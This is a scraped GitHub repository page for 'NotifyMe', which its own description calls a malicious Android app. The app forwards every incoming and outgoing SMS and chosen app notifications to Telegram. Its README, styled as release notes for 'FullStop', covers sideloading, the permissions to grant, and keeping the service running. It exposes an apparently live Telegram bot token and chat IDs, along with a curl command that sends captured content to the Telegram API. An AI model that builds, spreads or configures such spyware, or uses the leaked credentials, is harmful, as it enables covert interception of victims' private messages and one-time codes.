Skip to content

This is a ultimate malicious app, it able to Forward all incoming and outgoing sms to telegram app. Also able to Forward specific App notification, also able to create a personal server.

Notifications You must be signed in to change notification settings

MSI-Sirajul/NotifyMe

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 

Repository files navigation

NotifyMe — Release Notes

Version: 15.5.4 • Release date: 11/08/2025

Overview

FullStop is an all-in-one mobile utility that: captures and processes system notifications, reads and rates incoming SMS, forwards selected notifications/SMS to Telegram (and other targets), and identifies phone activity (foreground app / screen events) for contextual workflows.

Short: notification handling + SMS processing + forwarding + phone activity identification — packed into one app.

Key Features

  • Notification Read & Forward — capture system notifications, filter, redact, and forward to Telegram/chat targets.
  • SMS Read, Rate & Forward — read incoming SMS, apply rating rules (spam/important/auto-tag), and forward to configured channels.
  • Phone Activity Identification — detect active app, screen on/off, call states to tag context with forwarded messages.
  • Telegram Integration — direct Telegram Bot API support; forward to single or multiple chat IDs or channels.
  • Multi-target Forwarding — Telegram + HTTP webhook endpoints + optional email/S3 (placeholders).
  • Rule Engine — customizable rules for filtering, masking PII, auto-forward, or suppressing alerts.
  • Local Log & Audit — local message logs, with export option (CSV/JSON).

Installation & Upgrade

  1. Download the APK: FullStop-v{{VERSION}}.apk
  2. Enable Install unknown apps for your package installer if required.
  3. Install/Upgrade — existing settings are preserved on in-place upgrade. If you face permission issues, uninstall then reinstall.

Permissions Required

  • Notification access — to read and capture notifications.
  • SMS receive & read — to detect and process SMS (Android SMS permissions).
  • Foreground service — to reliably track phone activity and keep the app alive.
  • Network access — to forward messages to Telegram / webhooks.
  • Optional storage — to export logs (CSV/JSON).

Configuration — required placeholders

Below are the key configuration placeholders you must fill before using forwarding features. Replace {{...}} tokens with real values.

Telegram settings
  • TELEGRAM_BOT_TOKEN: e.g. 8462399272:AAGqOZLNh6bnuIVEdEUXtpF0b7MPXh4pMwk
  • DEFAULT_CHAT_ID: e.g. 8030227425
  • ADDITIONAL_CHAT_IDS: comma-separated list, 8030227425,5185579644
Webhook / HTTP targets
  • WEBHOOK_URL_1: {{WEBHOOK_URL_1}}
  • Optional auth header: WEBHOOK_AUTH_HEADER={{WEBHOOK_AUTH_HEADER}}
Forwarding rules & privacy
  • PII mask template: {{PII_MASK}} (example: ***MASKED***).
  • Phone activity tag: set to ON/OFF to append active-app context.

Note: For Telegram bot setup, follow the standard BotFather flow to create a bot and obtain the bot token. Use the bot token above to send messages programmatically.

Sample Telegram POST (curl)

curl -s -X POST "https://api.telegram.org/bot8462399272:AAGqOZLNh6bnuIVEdEUXtpF0b7MPXh4pMwk/sendMessage" -d chat_id="8462399272" "5185579644" -d text="New notification from NotifyMe: {{MESSAGE_PREVIEW}}"

Replace tokens with real values. The app can call this automatically when forwarding rules match.

Changelog (high level)

  • v{{VERSION}} — Unified release: Notification routing + SMS rating/forwarding + phone activity identification + multi-target forwarding + export logs.
  • Improved rule engine and PII masking.
  • Performance: reduced battery impact via optimized foreground service scheduling.

Known Issues & Limitations

  • Android OEM battery optimizations may stop the foreground service on some devices — ask user to whitelist the app in device power settings.
  • SMS reading requires explicit permission on recent Android versions; user must accept at runtime.
  • Telegram rate limits — forwarding a very high volume of messages may be throttled by Telegram APIs.

Security & Privacy

By default, FullStop will not forward messages containing configured sensitive patterns (PII). Configure the PII_MASK and rule engine to redact phone numbers or other secrets. Stored logs are local; enable encrypted backups at your own risk.

How to Customize Copy (examples)

// Toggle phone activity tagging PHONE_ACTIVITY_TAGGING=ON

// Set PII mask PII_MASK=REDACTED

// Default targets TELEGRAM_BOT_TOKEN="{{TELEGRAM_BOT_TOKEN}}" DEFAULT_CHAT_ID="{{TELEGRAM_CHAT_ID}}" WEBHOOK_URL_1="{{WEBHOOK_URL_1}}"

Support & Contact

If you find bugs or want new features, please report to {{SUPPORT_EMAIL}} or open an issue at {{ISSUE_TRACKER_URL}}.

License

© {{YEAR}} FullStop — include your license here (MIT / Apache-2.0 / Proprietary).

Generated: {{RELEASE_DATE}} • Template engine: smackdown/html-markdown • Edit placeholders before publishing.

Telegram Credentials:

BOT_Token:
Notify Me:8462399272:AAGqOZLNh6bnuIVEdEUXtpF0b7MPXh4pMwk
Chat ID:
NotifyMe 8030227425
MSI 5185579644

About

This is a ultimate malicious app, it able to Forward all incoming and outgoing sms to telegram app. Also able to Forward specific App notification, also able to create a personal server.

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages